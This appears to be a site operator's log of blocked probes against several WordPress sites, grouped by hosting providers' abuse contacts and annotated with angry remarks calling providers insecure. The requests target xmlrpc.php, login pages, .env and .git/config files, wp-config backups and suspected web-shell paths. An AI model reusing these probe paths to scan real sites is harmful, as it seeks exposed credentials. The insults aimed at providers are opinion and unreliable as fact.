52.169.251.137 website*2.de – – [13/Jul/2025:05:38:03 +0200] „GET /wp-content/plugins/wordpresss3cll/includes.php HTTP/1.0“ 403 – „-“ „-“
52.169.251.137 website*2.de – – [13/Jul/2025:05:38:03 +0200] „GET /defaults.php HTTP/1.0“ 302 – „-“ „-“

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
158.220.102.209 website*3.com – – [12/Jul/2025:02:25:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuseteam@phoenixnap.com
103.243.172.242 website*3.com – – [12/Jul/2025:03:15:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
admin@internetnamesforbusiness.com
2001:1810:4181:120:0:4:42af:2c16 website*3.com – – [12/Jul/2025:04:29:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@biznetgio.com
103.127.134.129 website*3.com – – [12/Jul/2025:05:53:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@sioru.com
80.251.219.111 website*3.com – – [12/Jul/2025:06:21:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
network@abuse.team
2001:67c:2070:c810::1 website*3.com – – [12/Jul/2025:07:03:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@hosteons.com
2402:d0c0:11:7b3::1 website*3.com – – [12/Jul/2025:07:33:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

noc@perfectip.net
74.81.43.210 website*3.com – – [12/Jul/2025:08:23:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@horizoniq.com – HERE WITH 2 ATTEMPTS – VERY UNSECURE!
173.236.127.48 website*3.com – – [12/Jul/2025:09:00:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
173.236.127.48 website*3.com – – [13/Jul/2025:05:04:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@contabo.de
45.134.226.158 website*3.com – – [12/Jul/2025:09:54:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ovh.net
141.95.53.61 website*3.com – – [12/Jul/2025:10:36:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@microsoft.com
20.198.224.111 website*3.com – – [12/Jul/2025:12:26:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
m2310@emax.net.tw
203.217.101.237 website*3.com – – [13/Jul/2025:02:51:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@nexcess.net
173.249.144.86 website*1.com – – [12/Jul/2025:20:26:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
info@zhost.vn
2406:30c0:0:66:be24:11ff:fe2e:3b02 website*1.com – – [12/Jul/2025:21:06:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
ispnochfcl@infotelconnect.com
112.196.0.228 website*1.com – – [13/Jul/2025:01:52:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@worldhost.group
65.181.112.107 website*4.com – – [12/Jul/2025:03:23:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@roeth-und-beck.de
2a0e:6a80:3:439:: website*4.com – – [12/Jul/2025:03:54:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
net-arin@velia.net
50.30.32.22 website*4.com – – [12/Jul/2025:05:36:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@thegigabit.com
103.205.211.78 website*4.com – – [12/Jul/2025:06:27:04 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
trustandsafety@support.aws.com
13.202.153.160 website*4.com – – [12/Jul/2025:07:39:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@bluehost.com
162.241.174.216 website*4.com – – [12/Jul/2025:09:07:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ntup.net – VERY IGNORANT AND VERY UNSECURE PROVIDER – COMPLETE BLOCKED AT MANY WEBSITES!!!
194.145.227.125 website*5.de – – [12/Jul/2025:02:28:25 +0200] „GET /administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“
bucklog@proton.me – VERY IGNORANT AND UNSECURE PROVIDER – COMPLETE BLOCKED AT MANY WEBSITES!!!
185.177.72.204 website*5.de – – [12/Jul/2025:04:29:37 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.204 website*5.de – – [12/Jul/2025:04:29:37 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@ionos.com
74.208.78.13 website*5.de – – [13/Jul/2025:04:42:20 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
74.208.78.13 website*5.de – – [13/Jul/2025:04:42:24 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
74.208.78.13 website*5.de – – [13/Jul/2025:04:42:27 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

abuse@telstra.net
2001:8004:1680:4a2f:5c40:1a63:20be:74c7 website*5.de – – [13/Jul/2025:11:13:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@virtualine.org
198.55.98.222 website*5.de – – [13/Jul/2025:13:39:36 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13“

anush@advinservers.com – HERE WITH 2 ATTEMPTS! – VERY UNSECURE!
2602:fb54:9fa:: www.website*6.de – – [13/Jul/2025:05:14:04 +0200] „GET /wp-content/plugins/yanierin/akc.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fb54:9fa:: www.website*6.de – – [13/Jul/2025:05:14:14 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
abuse@ovh.net – – HERE WITH 2 ATTEMPTS! – VERY UNSECURE!
141.95.4.134 www.website*6.de – – [13/Jul/2025:05:45:26 +0200] „GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
141.95.4.134 www.website*6.de – – [13/Jul/2025:05:45:26 +0200] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
abuse@colocatel.com – MANY ATTEMPTS, VERY UNSECURE!!!
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:32 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:33 +0200] „GET /wp-includes/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:34 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:34 +0200] „GET /wp-content/plugins/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:35 +0200] „GET /wp-content/themes/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:36 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:36 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:42 +0200] „GET /.well-known/pki-validation/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:44 +0200] „GET /.well-known/acme-challenge/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
193.142.147.5 www.website*6.de – – [13/Jul/2025:12:57:45 +0200] „GET /css/ HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

abuse@shinjiru.com.my,noc@shinjiru.com.my
101.99.88.163 website*2.de – – [13/Jul/2025:11:20:03 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36“
abuse@ionos.com – NEXT ONE TODAY! – VERY UNSECURE!
74.208.58.23 website*2.de – – [13/Jul/2025:13:37:50 +0200] „GET /wp-config.php.old HTTP/1.0“ 403 – „-“ „-“
74.208.58.23 website*2.de – – [13/Jul/2025:13:37:50 +0200] „GET /wp-config.php_ HTTP/1.0“ 403 – „-“ „-“
74.208.58.23 website*2.de – – [13/Jul/2025:13:37:50 +0200] „GET /wp-config.php.save HTTP/1.0“ 403 – „-“ „-“
74.208.58.23 website*2.de – – [13/Jul/2025:13:37:50 +0200] „GET /wp-config.php.orig HTTP/1.0“ 403 – „-“ „-“
abuse@virtualine.org – AND THE NEXT ONE TODAY!!! – VERY UNSECURE PROVIDER!!!
198.55.98.222 website*2.de – – [13/Jul/2025:13:55:18 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Links/0.9.1 (Linux 2.4.24; i386;)“
198.55.98.222 website*2.de – – [13/Jul/2025:14:22:44 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99“
198.55.98.222 website*2.de – – [13/Jul/2025:14:23:58 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36“
198.55.98.222 website*2.de – – [13/Jul/2025:14:42:51 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36“

noc@perfectip.net
2607:fa98:1000:3:20c:29ff:fee8:42ef website*4.com – – [12/Jul/2025:11:09:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@contabo.de
194.233.93.24 website*4.com – – [13/Jul/2025:02:59:48 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@ovh.ca, abuse@ovh.net – OVH HERE WITH 3 IP´S! – VERY UNSECURE!
167.114.172.130 website*4.com – – [13/Jul/2025:04:20:23 +0200] „GET /.well-known/gpc.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0“
54.38.94.117 website*4.com – – [13/Jul/2025:04:36:49 +0200] „GET /.well-known/openid-configuration HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 OPR/118.0.0.0“
137.74.223.84 website*4.com – – [13/Jul/2025:05:19:05 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*4.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

dmzhostabuse@gmail.com – VERY IGNORANT, VERY UNSECURE!
45.148.10.80 website*4.com – – [13/Jul/2025:04:54:03 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0“
abuse@clouding.io
185.254.204.30 website*4.com – – [13/Jul/2025:05:10:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*4.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
abuse@myloc.de
89.163.242.76 website*4.com – – [13/Jul/2025:05:39:50 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

klayliang@tencent.com – TENCENT IST COMPLETE UNWANTED – COMPLETE BLOCKED!
111.230.35.97 website*4.com – – [13/Jul/2025:05:45:57 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*4.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
tech@cloudinnovation.org
154.91.179.26 website*4.com – – [13/Jul/2025:05:50:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@netcup.de
89.58.55.156 website*4.com – – [13/Jul/2025:06:19:28 +0200] „GET /atom.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 OPR/118.0.0.0“

google-cloud-compliance@google.com – EVERY DAY TO MANY HACKING ATTEMPTS!
35.211.191.91 website*4.com – – [13/Jul/2025:06:30:04 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*4.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
abuse@ionos.com
194.164.54.162 website*4.com – – [13/Jul/2025:06:57:22 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*4.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0“
abuse.gh@vodafone.com
102.176.65.174 website*4.com – – [13/Jul/2025:07:03:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

ip-admin@telkom.net.id
125.165.98.90 website*4.com – – [13/Jul/2025:07:03:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@idnic.net
103.189.104.3 website*4.com – – [13/Jul/2025:07:50:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@microsoft.com – VERY UNSAFE PROVIDER! VERY MUCH HACKING-ATTEMPTS EVERY DAY!
20.198.224.111 website*4.com – – [13/Jul/2025:08:31:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@microsoft.com
20.198.224.111 website*4.com – – [13/Jul/2025:10:48:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@vialis.net
85.95.216.149 website*4.com – – [13/Jul/2025:11:35:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@horizoniq.com
173.236.127.48 website*1.com – – [13/Jul/2025:02:46:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@telekom.de
84.143.170.204 website*1.com – – [13/Jul/2025:04:58:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
rsteward@velia.net
50.30.32.22 website*1.com – – [13/Jul/2025:06:21:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@mammothmedia.com.au
110.232.114.55 website*1.com – – [13/Jul/2025:06:36:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“
abuse@ovh.us
51.81.207.12 website*1.com – – [13/Jul/2025:06:53:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
abuse@ovh.net
193.70.81.186 website*1.com – – [13/Jul/2025:11:09:40 +0200] „GET /.well-known/gpc.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
abuse@ovh.ca
158.69.120.60 website*1.com – – [13/Jul/2025:14:56:32 +0200] „GET /?blackhole HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 OPR/118.0.0.0“
abuse@hostinger.com
2a02:4780:d:b623::1 website*1.com – – [13/Jul/2025:07:32:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

hostmaster@nic.ad.jp
49.212.148.38 website*1.com – – [13/Jul/2025:09:06:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
kornet_ip@kt.com
121.144.120.196 website*1.com – – [13/Jul/2025:10:28:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
soc@viettel.com.vn – MANY PROVIDERS IN VIETNAM ARE VERY UNSECURE – TO MANY HACKER-IDIOTS EVERY DAY!!!
171.244.0.91 website*1.com – – [13/Jul/2025:12:16:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

hostmaster@nic.ad.jp
49.212.148.38 website*3.com – – [13/Jul/2025:04:06:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@ionos.com – HERE WITH 3 ATTEMPTS – VERY UNSECURE!
74.208.78.13 website*3.com – – [13/Jul/2025:04:21:37 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
74.208.78.13 website*3.com – – [13/Jul/2025:04:21:40 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
74.208.78.13 website*3.com – – [13/Jul/2025:04:21:43 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
network.gtsvn@gmail.com
113.192.8.160 website*3.com – – [13/Jul/2025:05:08:20 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*3.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

abuse@namecheaphosting.com
159.198.64.48 website*3.com – – [13/Jul/2025:05:28:32 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http:// website*3.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
reportabuse@racknerd.com
104.168.22.92 website*3.com – – [13/Jul/2025:06:04:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http:// website*3.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
soc@viettel.com.vn
2402:800:63b8:d004:be24:11ff:fee4:a8ca website*3.com – – [13/Jul/2025:06:32:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@latitude.sh – HERE WITH 2 ATTEMPTS – VERY UNSECURE!
103.14.26.234 website*3.com – – [13/Jul/2025:06:37:36 +0200] „GET /randkeyword.PhP7 HTTP/1.0“ 403 – „-“ „-“
103.14.26.234 website*3.com – – [13/Jul/2025:06:37:36 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
ripe@tana.ir
194.60.230.112 website*3.com – – [13/Jul/2025:06:39:51 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http:// website*3.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
abuse@hidata.org
185.222.163.90 website*3.com – – [13/Jul/2025:07:16:03 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http:// website*3.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

abuse@amazonaws.com – HERE WITH 2 IP´S!
52.49.169.239 website*3.com – – [13/Jul/2025:07:39:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
18.158.88.235 website*3.com – – [13/Jul/2025:09:18:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
bucklog@proton.me – HERE WITH 5 ATTEMPTS – VERY IGNORANT AND UNSECURE PROVIDER!!!
185.177.72.205 website*3.com – – [13/Jul/2025:09:54:56 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.205 website*3.com – – [13/Jul/2025:09:55:06 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.205 website*3.com – – [13/Jul/2025:09:55:06 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.205 website*3.com – – [13/Jul/2025:09:55:06 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
